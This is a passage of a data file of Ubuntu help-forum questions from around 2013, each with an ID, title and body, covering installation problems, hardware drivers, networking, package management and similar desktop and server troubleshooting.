00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices [ amd ] device 43a0 00:15.1 pci bridge : advanced micro devices [ amd ] device 43a1 00:15.2 pci bridge : advanced micro devices [ amd ] device 43a2 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express ard reader ( rev 01 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 07:00.0 network controller : ralink corp. device 3290 07:00.1 bluetooth : ralink corp. device 3298
278062	how to setup a file sharing service from ubuntu server over the net ?	i have ubuntu server edition that i ssh form on my mac and windows computers . i would like to know if there is any service i can install on my server that allows me to save and access my files from anywhere in the world ove the internet , similar to dropbox . i would prefer it if it is free . many thanks .
278065	ubuntu 12.04 installer does not ask for target harddrive to install os	i have been a linux user for 10+ years , and i just had my worst linux experience today with ubuntu . unfortunately , the ubuntu 12.04 installer does not ask me for the destination harddrive i want to install the rootfs on . having a total of 4 drives on my pc , four normal sata drives , and one raid-1 1-terabyte drive . after clicking on `` wanting to install ubuntu linux with windows '' , ubuntu installer automatically reformat my 1-terabyte drive and install the os on there . i did not even have a chance to say no . this is the worst ubuntu installer ever , it makes to much assumption for the user . i mind as well use windows instead if ubuntu was this dumb . as the result , i lost 600gb worth of data . ubuntu needs to fire the project manager who is responsible for the installer . it is trash . i promise not to use ubuntu again .
278066	why does n't vmware 7 recognize the kernal headers for version 3.5.0-26-generic ?	i installed vmware 7.0 on ubuntu 12.10 and when i run it i get an error that says : vmware kernel module updater before you can run vmware , several modules must be compiled and loaded into the running kernel . kernel headers 3.5.0-26-generic kernel headers for version 3.5.0-26-generic were not found . if you installed them in a non-default path you can specify the path below . well , i have the headers and no matter what i do to browse to them the updater will not accept them . any ideas why ?
278068	how to package a shell script ?	i have a shell script . i want to convert the script into a terminal application which can be installed using sudo apt-get install and can be run through the terminal by typing the name of the application . i am new to development in ubuntu and i am not able to understand how to proceed .
278070	ubuntu command 'adduser ' is not creating directory 'usertes ' in '/home '	i have been creating a user with command adduser , but it did not create directory /home/usertes , # adduser usertes and this happens if i delete the user with command userdel : # userdel usertes userdel : user usertes is currently logged in not logging on to the server , i login with root . how do i create the directory in /home and , if logging in as usertes , the current directory will be /home/usertes ? as it is now , if i login , i go to directory / .
278071	uninstall build dependencies using apt-get	to install the build dependencies of some software , we use command $ sudo apt-get build-dep xxxx what to do in case we want to remove those packages only , those dependency packages installed by build-dep ?
278075	using an ssd - things to consider ?	i am considering to buy an ssd disk for my laptop . i know it 's very fast , but i am concerned about its lifetime and data integrity . can you please share your experience about using ssd in your computers ? is it really robust ? have you had any failures ? how often ? what was the reason ? what about hybrid disks ? if i decide to install an ssd disk on my laptop : which file system to use ? is ext4 ok ? f2fs - not production ready ? no good support on ubuntu yet ? on which partitions to use ? the root on ssd and home on hdd ?
278076	ubuntu 12.10 freeze in the ubuntu logo	i have brought a new computer with no operating system with the intention of installing ubuntu 12.10 and quite excited about it . new computer is a zoostorm amd a4 3300 dual core despite trying with both a bootable usb and a dvd with ubuntu 12.10 on them , the computer will ask if i want to install or try it then when i click on install it freezes and does nothing more on a black screen or the purple screen which merely shows `` ubuntu '' . when i try to install a windows 7 pro from dvd it has no problems . i am suspecting a clash with hardware but any ideas would be welcome as i really do want to use ubuntu and not windows 7 on this machine and brought for the sole purpose of this .
278080	latitude d830 ca n't get wireless card & nic adapter to be recognized	new to ubuntu and using 12.04 . can anyone tell me how i can activate the wireless adapter & the nic integrated adapter ? network pci adapter : broadcom netxtreme 57xx gigabit controller . wireless adapter : dell wireless 1490 dual band wlan mini card . j1234 @ 1234 : ~ $ lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:01.0 pci bridge : intel corporation mobile pm965/gm965/gl960 pci express root port ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation g86 [ quadro nvs 140m ] ( rev a1 ) 03:01.0 cardbus bridge : o2 micro , inc. cardbus bridge ( rev 21 ) 03:01.4 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g ( rev 01 ) thanks in advance . best regards .
278084	conky : grabbed text has multiple lines and does not align	i 'm grabbing the output of u1sdtool -- cur to be reported in my conky . the output is : u1sdtool -- cur current uploads : 0 current downloads : 0 this text is grabbed in the text part of my conkyrc config file as : $ { goto 55 } $ { font ubuntu : size=10 , weight : normal } $ { color } u1 sync $ { goto 55 } $ { font ubuntu : size=10 , weight : normal } $ { color1 } $ { exec u1sdtool -- cur } given that the text returned from u1sdtool -- cur has two lines , the first line will be offset by 55 but the second will not . see the bottom of the image . i would like to see the 'current downloads ' line be offset at 55 as well . any idea how to do this ? this conky config file is my customized version of hardball 's orange theme edit : what i would like to have , ideally , is the correct alignment and , once i do have uploads , see a list of file names . such as eg . u1 sync current uploads : 3 filename.txt filename.jpg filename.zip current downloads : 0
278088	text editor where unsaved files can be recovered after computer crash ?	i use text editor to draft emails and other messages . not files that i want to save , just drafts . problem : when my computer crashes ( happens often recently ) , i loose the drafts . is there a text editor that backs up unsaved files somewhere ? ( preferably in a single place ) i tried text editor ( gedit ) , and leafpad . note : i do n't want ~example files to be created everywhere , because they are a mess in the terminal , and can be dangerous when sharing usb sticks . so unfortunately i ca n't use gedit 's backup feature .
278090	install ubuntu on empty hard drive	can i install ubuntu on an empty hard drive ? or do i need windows installed to install it ?
278092	visual freeze during startup	just upadted to 12.10 now it visually freezes with the load screen ( ubuntu with the red dots under it ) the usual sound for the log-on screen is played and i can apparently log in but the screen image does n't change .
278096	ubuntu 12.10 resets keybindings	i use ubuntu 12.10 and i want to map the show-desktop keybinding to super+d . i tried to configure it in compiz configuration manager , in the system properties-keyboard configuration and in dconf-editor but without success . after each reboot the value of the dconf entry is reset to the default value < primary > < super > < d > . i really do n't know what to do now : p
278099	pidgin status icon in 13.04 / raring ringtail	i upgraded from ubuntu 12.04 to 13.04 . looks great , but the pidgin status icon does not appear in the upper right corner . how can i fix this ?
278101	configure gre tunnel to start on reboot ?	i 'm trying to configure gre tunnel ( between 2 vbox ubuntu server 12.04 lts on win 7 host ) but it keep failed . can anyone help ? ? ? ? ? ? the configuration in /etc/network/interfaces vbox a ip address 172.168.1.1 /24 ip tunnel 10.0.201.1 /24 vbox a iptunnel add tunx mode gre remote 172.168.1.1 local 172.168.2.1 ttl 225 ifconfig tunx 10.0.201.1/24 ifconfig tunx up ifconfig tunx pointopoint 10.0.201.2 ifconfig tunx multicast vbox b ip address 172.168.2.1 /24 ip tunnel 10.0.201.2 /24 seting tunnel di vbox b iptunnel add tuny mode gre local 172.168.2.1 remote 172.168.1.1 ttl 225 ifconfig tuny 10.0.201.2/24 ifconfig tuny up ifconfig tuny pointopoint 10.0.201.1 ifconfig tuny multicast ( but ifconfig shows the tunnel is up ) i 'll really appreciate any help : ) are there any other way to configure the gre tunnel to start on reboot beside /etc/network/interfaces configuration ? ? ?
278103	would upgrade destroy my home folder ?	i have at the moment ubuntu 12.04.2 lts installed and planning on installing 13.04 . i have my root ( '/ ' ) mounted on one partition and my home ( '/home ' ) on other partition . if i would upgrade through normal installation ( live usb/cd with format of '/ ' ) and set installation paramaters ( same user , same computer name , same password , '/ ' on one partition and '/home ' on other partition ) like my old one , would it keep my /home directory intact ? i know if i would reinstall same version of ubuntu it wo n't break anything , but do n't know nothing if i upgrade .
278104	ubuntu version for senior pc	i have been running this pc on ubuntu 10.10 and it has been pretty great . with the hdd filling up and persistent messages about my version of ubuntu not being supported i started again on 12.04 . i am not really feeling the love with this version . personally i despise the desktop with the icons down the left hand side so the first thing i do is install the classic version . now i am not sure if this is the problem but the performance is pretty underwhelming compared to 10.10 and i will be the first to admit this pc is old ( see below ) . can someone suggest a build better suited for a more 'senior ' computer ? system information running ubuntu linux , the ubuntu 12.04 ( precise ) release . gnome : unknown ( unknown ) kernel version : 3.5.0-23-generic ( # 35~precise1-ubuntu smp fri jan 25 17:15:33 utc 2013 ) gcc : 4.6 ( i686-linux-gnu ) xorg : 1.13.0 ( 19 january 2013 12:41:05pm ) hostname : kbox-workstation uptime : 0 days 0 h 43 min cpu information authenticamd , amd athlon ( tm ) 64 processor 3500+ number of cpus : 1 cpu clock currently at 1000.000 mhz with 512 kb cache numbering : family ( 15 ) model ( 47 ) stepping ( 2 ) bogomips : 2200.16 flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt lm 3dnowext 3dnow up pni lahf_lm memory information total memory : 2016 mb total swap : 19172 mb storage information scsi device - scsi1 vendor : ata model : wdc wd800jd-75ms scsi device - scsi3 vendor : ata model : samsung hd103uj scsi device - scsi4 vendor : dvdrw model : ide 16x scsi device - scsi9 vendor : usb2.0 model : hs-cf hardware information motherboard host bridge advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control pci bridge ( s ) nvidia corporation ck804 pci bridge ( rev f2 ) ( prog-if 01 [ subtractive decode ] ) nvidia corporation ck804 pcie bridge ( rev f3 ) ( prog-if 00 [ normal decode ] ) nvidia corporation ck804 pcie bridge ( rev f3 ) ( prog-if 00 [ normal decode ] ) nvidia corporation ck804 pcie bridge ( rev f3 ) ( prog-if 00 [ normal decode ] ) nvidia corporation ck804 pcie bridge ( rev a3 ) ( prog-if 00 [ normal decode ] ) isa bridge nvidia corporation ck804 isa bridge ( rev f3 ) subsystem : asustek computer inc. device 815a ide interface nvidia corporation ck804 serial ata controller ( rev f3 ) ( prog-if 85 [ master seco prio ] ) subsystem : asustek computer inc. k8n4-e or a8n-e mainboard graphic card vga controller nvidia corporation nv43 [ geforce 6600 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) sound card multimedia controller creative labs sb audigy ( rev 04 ) subsystem : creative labs sb audigy 2 zs ( sb0350 ) network ethernet controller realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) subsystem : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ nvidia graphic card information model name : unknown card type : unknown 16x video ram : 256 mb gpu frequency : 300 mhz driver version : nvidia unix x86 kernel module 304.84 wed feb 27 05:03:32 pst 2013
278107	how to sudo apt-get install all latex cjk ?	is there a way to just install latex packages with sudo apt-get install ? ? like for https : //apps.ubuntu.com/cat/applications/quantal/latex-cjk-chinese/ and also the japanese and korean ones ? i 'm on ubuntu 12.10 .
278112	ominous `` 8.5 gb volume '' on momentusxt under 12.10	i 'm looking for people who also have their ubunutu/linux running on a momentusxt st750lx003 . a partitiion/volume is shown to me that i ca n't mount , nor really place where it comes from . it is formatted in hfs+ and about 8gb large . could the drive have a defect and show me the ssd cache ? i read `` is seagate 's new âfast factor bootâ technology compatible with ubuntu ? `` , that it should n't . please find screenshots from both gparted , the error i receive when trying to open and from windows 7 drive manager . it 's not a dual-boot system on the momentusxt , rather ubuntu is installed alone on it , while windows 7 is on an extra ssd system ( c : ) . daten ( d : ) is a regular hdd . thanks for any advice what this volume could be , and/or how to solve the mounting error . preferably , please check your own momentusxts in gparted and let me know if this ~8gb hfs+ volume appears as well .
278115	dual screen setup in ubuntu with intel hd graphics	i have a ubuntu machine with integrated intel hd graphics with 2 monitors plugged into the two ports provided . with this setup both the monitors have exaclty same output . i needed to extend the x server 's functionality to support one more screen so that when i run some application it runs either on screen0 or on screen1 . to do this i added a file name monior.conf in /usr/share/x11/xorg.conf.d directory but does not work for me . the file looks like this : section `` serverlayout '' identifier `` dualscreen '' screen 0 `` screen0 '' screen 1 `` screen1 '' rightof `` screen0 '' endsection section `` monitor '' identifier `` monitor0 '' endsection section `` monitor '' identifier `` monitor1 '' endsection section `` device '' identifier `` card0 '' driver `` intel '' busid `` pci:00:02.0 '' endsection section `` device '' identifier `` card1 '' driver `` intel '' busid `` pci:00:02.0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' endsection but this does n't work . the output of xrandr is as following : screen 0 : minimum 1280 x 900 , current 1280 x 900 , maximum 1280 x 900 default connected 1280x900+0+0 0mm x 0mm 1280x900 0.0* what i need is two screens independent of each other and windows can not be moved between them . please help me to get this done .
278117	netflix requires silverlight update message	can someone please give me some help updating ? i 've tried running the silverlight exe via wine but that did n't work ... any ideas ? !
278118	virtualbox 4.1.12 unable to connect to network	i 'm trying to create a vagrant basebox for debian lenny . the first step in this process is creating a vm guest in virtualbox . i 've created a new vm image and begun installation of debian lenny using the netinst image . however , the vm refuses to connect to the network . my ubuntu host has a standard ethernet network connection with full internet access . after configuring the root and non-root users , the non-gui installer prompts me to select a mirror for downloading additional packages . regardless of the mirror seleceted , the following message is displayed : bad archive mirror the specified debian archive mirror is either not available , or does not hae a valid release file on it . please try a different mirror . i have tried 2 network configurations for the vm guest by right-clicking on the guest item listed in virtualbox manager - > settings - > network . the first is the default configuration , this being : attached to : nat the second was : attached to : bridged adapter name : eth0 promiscuous mode : deny neither has any effect . i chose to continue the installation anyway , so am now in the lenny guest os . is there a simple fix to enable networking for this vm ? sincere thanks for your time .
278121	quickly does n't import glib	i 'm having a little problem with quickly . it wo n't import glib , as i am relatively new to programming , with only a few weeks of coding under my belt , i 've decided to try using quickly following the quickly tutorial to start me off , as presently i 'm learning java and xml for android app programming and find it very interesting . problem is , i have absolutely no idea what to do or what the error actually means , is there anyone out there who could help me out ? this the error i get when i try to run it through the terminal : error : root : could not find any typelib for glib \traceback ( most recent call last ) : file `` bin/jokky '' , line 32 , in module import jokky file `` /home/abunujum/quickly/jokky/jokky/__init__.py '' , line 14 , in module from jokky import jokkywindow file `` /home/abunujum/quickly/jokky/jokky/jokkywindow.py '' , line 18 , in module from gi.repository import glib # pylint : disable=e0611 importerror : can not import name glib and here is the code : import gettext from gettext import gettext as _ gettext.textdomain ( 'jokky ' ) from gi.repository import gtk # pylint : disable=e0611 import logging logger = logging.getlogger ( 'jokky ' ) from jokky_lib import window from jokky.aboutjokkydialog import aboutjokkydialog from jokky.preferencesjokkydialog import preferencesjokkydialog from gi.repository import glib # pylint : disable=e0611 import os class jokkywindow ( window ) : __gtype_name__ = `` jokkywindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( jokkywindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutjokkydialog self.preferencesdialog = preferencesjokkydialog # code for other initialization actions should be added here . def on_mnu_save_activate ( self , widget , data=none ) : # get the title for the note title = self.ui.entry1.get_text ( ) # get the string buff = self.ui.textview1.get_buffer ( ) start_iter = buff.get_start_iter ( ) end_iter = buff.get_end_iter ( ) text = buff.get_text ( start_iter , end_iter , true ) # create the filename data_dir = glib.get_user_data_dir ( ) jokky_dir = os.path.join ( data_dir , `` jokky '' ) filename = os.path.join ( jokky_dir , title ) # write the data glib.mkdir_with_parents ( jokky_dir , 0o700 ) glib.file_set_contents ( filename , text ) the code in the box is the majority of the code that i wrote sorry the question so long , i need help using quickly !
278122	how to properly install playonlinux , all the drivers , etc ?	i am ( re ) installing ubuntu 12.04 now , and i 'd like to ask what things i have to install to properly run games with playonlinux ? i mean do i need to install some kind of graphics driver , or directx , .net , etc ? does it come with wine ? how do i patch the games and how do i install the latest punkbuster for example ? thank you .
278124	how can i get canon lbp6020 working on ubuntu 12.04	i was misinformed about canon 6020 and bought it unfortunately . how can i get it working on ubuntu 12.04 ?
278127	gksudo nautilus only : `` can not load supported server method list . please check your gvfs installation ''	here a screenshot ( in danish , the english equiv can be seen here http : //askubuntu.com/a/187657/107445 , similar question but the answers does not solve the problem ) the very weird thing is , that this error only appears when i try to connect to a server from a nautilus opened as system user / gksudo . from a nautilus opened as `` anonymous '' user there is no problems connecting to server . i am also able to connect to server from `` places '' . i have runned sudo apt-get install gvfs-backends and as suggested in this similar question http : //askubuntu.com/a/187657/107445 sudo apt-get install -- reinstall gvfs-backends also sudo apt-get update sudo apt-get upgrade but still , this error appears , and only appears in nautilus as system user . does someone know the answer to this ? i am completely stuck .
278130	how do i run bioblender ?	i have downloaded the zip file for linux http : //bioblender.eu/db/bioblenderv0.6_linux.zip and extracted its contents , ran cd to the extracted directory but then when i ran ./blender as per the instructions in the text file , readme_linux that i found in the extracted directory , i received the error : ./blender : error while loading shared libraries : libjpeg.so.62 : can not open shared object file : no such file or directory the exact contents of the readme_linux file are : this setup works for blender 2.55 on ubuntu 10.04 lts `` lucid lynx '' , 32 bits . 1 . first of all you need to have python 2.6 or 2.7 installed , together with the matching version of numpy ( numerical python ) . you can find them in ubuntu sofware center or install them using synaptic . 2 you need pymol installed , you find it in the official universe repository for lucid . just enable `` universe '' in `` software sources '' , in the sofware center and install pymol as you did with python/numpy . 3 unpack bioblender in a suitable folder ( your home folder should be ok ) 4 cd to the directory containing bioblender executable and launch it from the console : ./blender i have blender , python and pymol installed at their latest respective versions available in software centre . i think i have numpy installed , because i know i have sagemath installed .
278134	use resources of high end servers to run lubuntu in low end hardware	in our home there is one high end computer with lots of ram and other low end old computer running lubuntu , the lubuntu itself has become slow so we were thinking of making the lubuntu machine a complete thin client and that would use the server 's lubuntu virtual machine . i feel that is possible but how ? i have oracle open box vm in the server can this vm be used as a remote vm on the thin client ? after a quick googling i found this thinclient which has an automated configurator for the thin client here . the least feature i want from this thin system would be atleast a full blown libre office operation . update : using vncserver on the lubuntu worked great for me . but still i have to install lubuntu to run vncserver , is it possible to run vncserver without an os ? or lightest os possible ? , the lubuntu itelf is an unneeded additional overhead ?
278136	while installing phpmyadmin i am getting an error	while installing phpmyadmin i am getting following error e : sub-process gzip returned an error code ( 100 ) e : prior errors apply to /var/cache/apt/archives/php5-gd_5.4.6-1ubuntu1.2_amd64.deb e : prior errors apply to /var/cache/apt/archives/php5-mysql_5.4.6-1ubuntu1.2_amd64.deb e : prior errors apply to /var/cache/apt/archives/dbconfig-common_1.8.47+nmu1_all.deb e : prior errors apply to /var/cache/apt/archives/libmcrypt4_2.5.8-3.1_amd64.deb e : prior errors apply to /var/cache/apt/archives/php5-mcrypt_5.4.6-0ubuntu1_amd64.deb e : prior errors apply to /var/cache/apt/archives/phpmyadmin_4 % 3a3.4.11.1-1_all.deb debconf : apt-extracttemplates failed : dpkg : warning : 'sh ' not found in path or not executable dpkg : warning : 'rm ' not found in path or not executable dpkg : warning : 'tar ' not found in path or not executable dpkg : error : 3 expected programs not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin e : sub-process /usr/bin/dpkg returned an error code ( 2 )
278139	execute bash script on shutdown	i have a kvm switch ( trendnet tk 409 ) that helps me switch between my ubuntu laptop and linux computer . the switch use a hotkey for switching ( numlock+numlock ) . unfortunatly , that only works on windows . i found a guide on the net , and have now a script called kvm ( etc/init.d ) # ! /bin/bash numlockx on ; sleep 1 ; numlockx off ; sleep 1 ; numlockx on exit 0 i have then attached a hotkey ( ctrl+numlock ) and this works perfectly.. but i would like to have done so that whenever i shutdown my ubuntu computer , the script is executed so that i can continue on my windows computer . as mentioned earlier kvm lies in etc/init.d and i have created a shortcut in rc0.d called k99kvm but whenever i turn of my ubuntu computer , the kvm doesnt switch to windows computer . as i said the script itself works perfectly with hotkeys , but it doesnt work when turning the computer off . help would be much appreciated ... a small question aswell . is it possible to create a hotkey in ubuntu like numlock+numlock ( 2 clicks on the same button ) and if yes , then how ?
278146	how to open firefox url having get parameter , through linux command line	not sure if it was asked before but i really couldnt find anything related to this . heres my question . opening a url in firefox through linux command line works fine , like below : firefox www.google.com ( this command works alright ) but , how do i open a url having get params . e.g . firefox www.google.com ? param1=val1 it url encodes the whole url and convers the `` ? '' to `` % 3f '' . on window open , the url becomes : www.google.com % 3fparam1=val1 and not understood by the browser
278149	chromium does n't show up to be selected as default browser	i installed chromium , but can not select it as my default browser . where does ubuntu keep the list of applications shown in this menu ? i use ubuntu 12.04 with unity as my environment . i also tried setting it with update-alternatives : kait @ frooops : applications $ update-alternatives -- config x-www-browser es gibt 2 auswahlmöglichkeiten für die alternative x-www-browser ( welche /usr/bin/x-www-browser bereitstellen ) . auswahl pfad priorität status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/bin/chromium-browser 40 auto-modus 1 /usr/bin/chromium-browser 40 manueller modus 2 /usr/bin/firefox 40 manueller modus but as you can see , it has no effect .
278152	usb multiboot with grub and options	is it possible to make an usb installer with the option of more than one release ? i have a 16gb usb stick and i would like to have the choice to install either amd64 or i386 or perhaps the option of ubuntu 12.04 or lubuntu 12.04 . can the stick be partitioned with a grub loader to give a choice of installers . ideally ubuntu 12.04 , lubuntu , 12.04 and debian6.0.7 with the boot recovery disk and a few windows applications as a toolkit . in theory it should be quite straight forward , get the stick to boot into grub and the different installers in the various partitions . i have attempted partitioning the stick and tried installing grub to it also but cant get it to boot . probably impossible but then nothing is truly impossible ... or is it ? no panic , just for giggles and to kill time and the occasional os .
278154	mass post-node-enlisting installation fails or does n't start !	i successfully installed a maas server including dhcp . using pxe boot node are getting an ip now . after pxe boot the machines shut down and i am able to accept and commission them using the web interface on the cluster controller . all works fine so far . in my naive way i now hoped , that at the next start , each node should install the image that was selected in the web interface and executing the post installation commands . but to my surprise the enlisting procedure starts again and the nodes are getting shut down every time . do i understand something wrong here in how to use the maas system ? best regards felix
278155	how to change the hibernate and suspend settings at a system-wide level in xfce ?	i 've found the following commands : xfconf-query -c xfce4-session -np '/shutdown/showsuspend ' -t 'bool ' -s 'false' xfconf-query -c xfce4-session -np '/shutdown/showhibernate ' -t 'bool ' -s 'false' to disable suspend and hibernate button from xfce . however those commands only effect the user that runs them . how can i set those parameters system wide ? ( all users : new and existing ) i 've found that the purpose of /etc/skel is for all new users but i ca n't find information on how to use it with xfce settings ... and it impacts only new users .
278157	youtube will not play in firefox or chrome on fresh 12.04 install	first of all let me state i am new to ubuntu and the linux platform all together . i decided to install on an older pc ( pentium 3 ) to get some use out of it . everything seems to have installed fine ( ubuntu 12.04 ) . immediately went to test the firefox and it would not play youtube videos . all i got was a black screen . checked , it had shockwave plug-in installed and up to date . so i downloaded chrome knowing flash is integrated into chrome . i got the messag : could not load shock wave flash on the home page . i downloaded ubuntu-restricted- ... . still wo n't work please help .
278159	does ubuntu 12.10 run on acer aspire one d270 with intel atom n2600 processor	can i upgrade my ubuntu 12.04 to version 12.10 on an acer aspire d270 ? it came with an intel atom n2600 cpu . much thx in advance !
278160	use existing /home ( not encrypted ) when installing ubuntu ?	i 'm planning to upgrade from quantal ( 50 gb of / , 2 gb of swap and 250 gb of /home ) to raring when it is released . clean install , choosing upgrade option only give me messy display . how do i mount my existing 250 gb /home ( not encrypted ) , when i install raring as my new /home ?
278166	libusb program not compiling	i am trying to compile a program that uses libusb library in ubuntu 12.04 . i have installed the libusb-1.0-0-dev . however when i try to compile a program as below : - # include < usb.h > # include < stdio.h > # include < libusb-1.0/libusb.h > int main ( ) { libusb_init ( null ) ; return 0 ; } it gives me an error saying /tmp/ccb75yte.o : in function 'main ' : usb.c : ( .text+0x11 ) : undefined reference to 'libusb_init' collect2 : ld returned 1 exit status i am using the command cc < file name > -lusb to compile it . what could be the problem ?
278169	main , restricted , multiverse , universe - how to know from where package is ?	is it possible to know such information about each package individually ?
278191	how i can set-up mysql on lubuntu for education purpose ?	i have lubuntu 12.10 x86 on my notebook with all updates . i downloaded and install mysql community server and mysql workbench . i learning java and our next lesson will be about mysql . i need to prepare - create test database . if i understand - i need use terminal for creating database ? i tried mysql -u root -p and after entering password i get : error 2002 ( hyooo ) ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) . and i do n't have this directory : /var/run/mysqld/mysqld.sock . i read some pages about this problem and it is not still repaired .
278192	ca n't boot windows 8 after installing ubuntu 12.10 !	i installed ubuntu 12.10 using something else . i made 2 new partitions in which i installed the swap and the file system . after i installed it , i found i could n't boot windows 8 . it booted straight into ubuntu 12.10 ! what do i do ? if i ca n't fix this i 'm going to be in some serious trouble with my dad ... i did n't use any windows partitions ... what happened ? i need to find out how to boot windows 8 again . please , somebody help me ...
278198	how can i be sure that the updated packages are not compromised ?	when trying to install tmux i get an error that untrusted packages could compromise your system 's security , similar to the situation in this thread . i ran aptitude update and the package installed without issue , but i am concerned that the update may have been compromised . my concern in enhanced as i see that the update was done without ssl ( http address ) : - neptune ( ) : ~ $ sudo aptitude update ign http : //il.archive.ubuntu.com quantal inrelease ign http : //il.archive.ubuntu.com quantal-updates inrelease ign http : //il.archive.ubuntu.com quantal-backports inrelease get : 1 http : //il.archive.ubuntu.com quantal release.gpg [ 933 b ] get : 2 http : //il.archive.ubuntu.com quantal-updates release.gpg [ 933 b ] get : 3 http : //il.archive.ubuntu.com quantal-backports release.gpg [ 933 b ] hit http : //il.archive.ubuntu.com quantal release get : 4 http : //il.archive.ubuntu.com quantal-updates release [ 49.6 kb ] ign http : //security.ubuntu.com quantal-security inrelease ign http : //archive.canonical.com quantal inrelease ign http : //extras.ubuntu.com quantal inrelease ign http : //dl.google.com stable inrelease ign http : //ppa.launchpad.net quantal inrelease ign http : //deb.opera.com stable inrelease ign http : //ppa.launchpad.net quantal inrelease edit : i have now been made aware that the targeted attacking of israeli websites on april 7 has already begun . therefore , there is increased suspicion of a compromised server . i could find more information about the attack if necessary , though i do n't see much mention of it in widespread english-language news websites . clarification : i 'm asking how to ensure that what i 've already downloaded and installed is not compromised . i am not asking how canonical ensures the security of repos .
278199	can i exclude certain repositories from apt-get upgrade ?	i have installed percona extra backup by adding their repository . this worked and i was able to install the software successfully . however now i am trying to run `` apt-get upgrade '' and it is trying to update percona . our client does not wish for this to be included in the regular updates as they wish to control this personally . is it possible to exlcude a repository when performing this ?
278200	why wo n't ubuntu boot ?	i got a pretty bad laptop ( a dell latitude d800 ) , and i 'm not able to install ubuntu 12.10 . when i tried to boot , the installer told me there was a problem with my cpu . i really want to run ubuntu ; is this a problem with my ubuntu disc or with my laptop ? win7 currently runs fine , so i suspect that it is a hardware problem .
278204	can i use my second ethernet port to bridge the first ?	for reasons of architectural design and the way people installed the phone lines in the 80s , my desktop and the router are a long way apart . i ran cat5 out to the desktop and that works great but wireless access near my desktop ( for my phone/tablet/etc ) a big pain in the bottom . the main issue is my phone dropping back to 2g , interfering with my speakers and causing themostannoyingnoiseintheworld . now my desktop has two network ports . i know what you 're thinking , i 'm a very lucky boy . i do n't mean to boast , but i also have a cheapy little access point . it can either extend wirelessly ( at painfully slow speeds ) or i can plug in an ethernet cable and run at 150mpbs . i 'd prefer the second : ) what i would like to do is plug the access port into eth1 and bridge eth1 to the network eth0 is connected to , without interfering my desktop 's connection on eth0 . i 'm not sure if this is possible but if it is , please give me a kick in the right direction .
